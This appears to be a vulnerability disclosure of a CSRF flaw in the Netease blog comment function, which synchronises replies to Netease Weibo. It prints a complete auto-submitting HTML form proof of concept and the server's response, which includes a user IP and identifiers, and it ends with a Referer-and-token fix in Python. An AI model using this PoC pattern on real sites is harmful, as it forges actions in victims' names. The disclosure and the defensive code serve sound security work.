1) Defect: replies posted through the comment function of the Netease blog are synchronized to Netease Weibo, and the request is accepted without verifying the Referer;
2) Log in to the Netease blog and run the following PoC:
<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://api.blog.163.com/lli.vip/dwr/call/plaincall/BlogBeanNew.addBlogComment.dwr" method="POST">
<input type="text" name="callCount" value="1"/>
<input type="text" name="scriptSessionId" value="${scriptSessionId}187"/>
<input type="text" name="c0-scriptName" value="BlogBeanNew"/>
<input type="text" name="c0-methodName" value="addBlogComment"/>
<input type="text" name="c0-id" value="0"/>
<input type="text" name="c0-e1" value="string:fks_08701_80081_4067086083081_1_2087083074083095081070093"/>
<input type="text" name="c0-e2" value="number:12979759"/>
<input type="text" name="c0-e3" value="string:"/>
<input type="text" name="c0-e4" value="string:ddd"/>
<input type="text" name="c0-e5" value="string:I _majia"/>
<input type="text" name="c0-e6" value="string:"/>
<input type="text" name="c0-e7" value="number:-1"/>
<input type="text" name="c0-e8" value="number:-1"/>
<input type="text" name="c0-e9" value="number:12979759"/>
<input type="text" name="c0-e10" value="string:lli.vip"/>
<input type="text" name="c0-e11" value="string:%E6%9D%8E%E9%BB%8E"/>
<input type="text" name="c0-e12" value="boolean:true"/>
<input type="text" name="c0-param0" value="Object_Object:{blogId:reference:c0-e1, blogUserId:reference:c0-e2, blogTitle:reference:c0-e3, content:reference:c0-e4, publisherNickname:reference:c0-e5, publisherEmail:reference:c0-e6, mainComId:reference:c0-e7, replyComId:reference:c0-e8, replyToUserId:reference:c0-e9, replyToUserName:reference:c0-e10, replyToUserNick:reference:c0-e11, synchMiniBlog:reference:c0-e12}"/>
<input type="text" name="c0-param1" value="string:"/>
<input type="text" name="c0-param2" value="boolean:false"/>
<input type="text" name="batchId" value="675126"/>
<input type="submit" value="submit">
</form>
<script>
document.se55i0n.submit();
</script>
</body>
</html>
The value of the parameter "c0-e4" is the reply content;
3) Run the PoC; the system returns the following result:
//#DWR-INSERT
//#DWR-REPLY
var s0=[];
dwr.engine._remoteHandleCallback('20170','0',{'abstract':"ddd", blogId:"logging", blogPermalink:"blog/static/675126", blogTitle:"\u996E\u98DF\u5F80\u4E8B\uFF082\uFF09", blogUserId:12979759, blogUserName:"lli.vip", circleId:0, circleName:null, circleUrlName:null, content:"ddd", id:"unauthorized", ip:"113.205.155.197", ipName:"\u91CD\u5E86", lastUpdateTime:1363878263025, mainComId:"-1", moveFrom:null, popup:false, publishTime:1363878263041, publishTimeStr:"23:04:23", publisherAvatar:0, publisher:"http://img.bimg.126.net/photo/hmZoNQaqzZALvVp0rE7faA==/0.jpg", publisherEmail:"", publisherId:218104121, publisherName:"majiagege", publisherNickname:"I _majia", publisherUrl:null, replyComId:"-1", replyToUserId:12979759, replyToUserName:"lli.vip", replyToUserNick:"\u674E\u9ECE", shortPublishDateStr:"2013-3-21", spam:0, subComments:s0, synchMiniBlog:true, valid:0});
4) Return to the Weibo site, refresh the page, and view the effect;
Solution:
Verify the Referer and add a token.
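The fix named in the solution (Referer verification plus a token), sketched as a server-side check for a state-changing call such as addBlogComment. This is an added example, not Netease's code; the host name, the secret, the csrf_token field and the function names are assumptions.

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import urlsplit

# Assumed values for the sketch: the site's own host and a server-side secret.
ALLOWED_HOSTS = {"blog.example.test"}
SERVER_SECRET = b"constructed-demo-secret"


def issue_token(session_id: str) -> str:
    """Per-session anti-CSRF token the site embeds in its own comment form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def source_host(headers: dict) -> Optional[str]:
    """Host the request was sent from: Origin first, Referer as fallback."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            try:
                parts = urlsplit(value)
            except ValueError:
                return None  # malformed header value: untrusted
            if parts.scheme in ("http", "https") and parts.hostname:
                return parts.hostname.lower()
            return None  # header present but unusable (e.g. "null"): untrusted
    return None  # both headers missing: reject rather than guess


def check_comment_request(method: str, headers: dict, session_id: str, form: dict):
    """Return (allowed, reason) for a state-changing call such as addBlogComment."""
    if method != "POST":
        return False, "method"
    if source_host(headers) not in ALLOWED_HOSTS:  # exact host match, no substring test
        return False, "referer"
    supplied = form.get("csrf_token", "")
    expected = issue_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "token"
    return True, "ok"


# Constructed request: an auto-submitting form hosted on another site, no token.
CROSS_SITE = {"Referer": "http://other.example.test/poc.html"}

if __name__ == "__main__":
    print(check_comment_request("POST", CROSS_SITE, "sess-1", {"c0-e4": "string:ddd"}))
```

The token check is what still holds when the Referer is absent or stripped, which is why the two controls are applied together.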